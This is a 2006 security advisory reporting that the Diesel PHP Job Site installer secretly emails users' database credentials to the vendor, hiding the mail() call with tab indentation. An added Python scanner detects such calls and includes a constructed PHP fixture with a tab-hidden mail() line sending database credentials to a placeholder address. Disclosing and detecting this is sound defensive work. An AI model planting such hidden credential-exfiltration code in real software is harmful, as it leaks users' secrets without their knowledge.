Subject: [Info Disclosure] Diesel PHP Job Site Latest Version

Severity: Pretty Bad
Title: Diesel PHP Job Site Latest Version Information Disclosure
Home Page: http://www.dieselscripts.com/
Product Page: http://www.dieselscripts.com/diesel-job-site.html
Date: May 17, 2006

Synopsis:
=========
When an unsuspecting user installs this software on their webserver, the installation details are emailed back to the original programmers of the software. The message is sent from install.php and includes the database host, database name, username, and password used to connect.

Background:
===========
This script allows job seekers to post their resumes and search job postings for free, while employers pay a fee to post jobs and search the resumes online. Free posting and searching is also possible.

Information:
============
I run a VOIP Jobs site tailored to the Asterisk Community. As I do not have much money or investors, I couldn't afford some swanky ass Job Board. I found this one, which was relatively cheap, but required register_globals. I bought it anyway (mistake #1). So, I thought I would be nice and edit their software to remove this requirement. While I was looking through the code I found this little gem in the install file.

Details:
========
In install.php, line 31, there is a call to a mail function that emails support@dieselscripts.com with your username, email, database credentials, hosts and passwords. Due to their licensing agreement I'm not actually allowed to post the offending line of code from the file.

It's worth mentioning that they also tried to hide this from unsuspecting users by tabbing it across the screen a number of times, so it was hidden if scrolling without word wrap on. Sneaky bastards.

Fix/Workaround:
===============
1. Don't use this software
2. Use it, but first comment/delete that line from install.php
3. Disable the ability to send mail from PHP/Server
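A way to check an installer for this kind of call before running it (the Details section above, and workaround #2): this is an added example, not code from the advisory or from Diesel Scripts. The PHP fragment it scans is constructed for the example, and the credential-name list and the 80-column "hidden" threshold are assumptions.

```python
"""Flag mail() calls in a PHP installer that reference database credentials.
Added example, not the advisory's or the vendor's code: a heuristic scan to run
over install.php before executing it."""
import re
from typing import NamedTuple

MAIL_CALL = re.compile(r"\b(mail|mb_send_mail)\s*\(", re.I)
# Names that usually hold connection secrets (assumed list; extend as needed).
CREDENTIAL_RE = re.compile(
    r"\$?\b\w*(pass(word|wd)?|db_?(host|name|user)|username|secret)\w*\b", re.I)
HIDDEN_INDENT_COLUMNS = 80  # past a typical terminal width when word wrap is off
COMMENT_PREFIXES = ("//", "#", "*", "/*")

class Finding(NamedTuple):
    line_no: int
    hidden: bool            # call starts beyond HIDDEN_INDENT_COLUMNS
    credential_refs: tuple  # credential-like names found in the call's arguments

def leading_columns(line: str, tab_width: int = 8) -> int:
    """Visual width of the leading whitespace, expanding tabs to tab stops."""
    expanded = line.expandtabs(tab_width)
    return len(expanded) - len(expanded.lstrip(" "))

def scan_php_source(source: str) -> list:
    """Return a Finding for every live (uncommented) mail() call in the source."""
    lines, findings = source.splitlines(), []
    for idx, line in enumerate(lines):
        if line.lstrip().startswith(COMMENT_PREFIXES) or not MAIL_CALL.search(line):
            continue
        call_text, depth = "", 0  # gather until parentheses balance; calls may span lines
        for extra in lines[idx:idx + 10]:
            call_text += extra + "\n"
            depth += extra.count("(") - extra.count(")")
            if depth <= 0:
                break
        refs = tuple(sorted({m.group(0) for m in CREDENTIAL_RE.finditer(call_text)}))
        findings.append(Finding(idx + 1, leading_columns(line) > HIDDEN_INDENT_COLUMNS, refs))
    return findings
# Constructed installer fragment (not the vendor's code): a harmless notice on
# line 5, then a credential-leaking call pushed 14 tabs to the right on line 6.
SAMPLE_INSTALL_PHP = "\n".join([
    "<?php",
    "$db_host = $_POST['db_host']; $db_user = $_POST['db_user'];",
    "$db_pass = $_POST['db_pass']; $db_name = $_POST['db_name'];",
    "mysql_connect($db_host, $db_user, $db_pass);",
    "mail($admin_email, 'Installation complete', 'Your site is ready.');",
    "\t" * 14 + "mail('support@example.invalid', 'install',",
    "\t" * 14 + "     \"$db_host $db_user $db_pass $db_name\");",
])
```

Run `scan_php_source` over the real install.php and treat any finding with a non-empty `credential_refs` or `hidden=True` as a line to inspect by hand before the installer is ever executed; once the line is commented out, the scan no longer reports it.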